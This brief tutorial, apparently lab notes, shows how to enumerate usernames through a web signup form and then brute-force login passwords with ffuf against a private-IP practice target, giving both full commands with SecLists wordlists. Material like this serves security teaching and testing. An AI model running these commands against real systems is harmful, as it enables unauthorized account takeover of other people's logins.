Username Enumeration
Let’s say that we have a web site http://10.64.156.171/customers/signup
and we want to get the usernames so we can use ffuf by using the following command
1
| ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.64.156.171/customers/signup -mr "username already exists"
|
Brute Force
Now we have some user names but how can we benefit from them?
We can brute force the passwords by using ffuf let’s see how
1
| ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.64.156.171/customers/login -fc 200
|